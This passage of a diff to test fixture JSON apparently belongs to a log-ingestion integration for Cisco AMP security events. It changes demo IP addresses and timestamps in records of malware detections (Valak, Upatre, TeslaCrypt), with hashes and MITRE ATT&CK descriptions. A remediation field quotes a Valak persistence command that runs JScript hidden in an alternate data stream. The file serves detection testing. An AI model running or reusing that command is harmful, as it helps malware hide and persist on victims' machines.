scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", + "ingested": "2021-12-09T13:35:32.897992800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "code": "1107296344", "kind": "alert" }, @@ -67,7 +67,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "threat_hunting": { "severity": "critical", @@ -174,7 +174,7 @@ "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -191,8 +191,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070128592Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898030200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -214,7 +214,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -277,7 +277,7 @@ "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -294,8 +294,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070130825Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898033800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -317,7 +317,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -368,7 +368,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -382,8 +382,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070132933Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:32.898041500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -405,7 +405,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -439,23 +439,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55810, @@ -481,8 +466,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -495,8 +480,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070135066Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898046Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 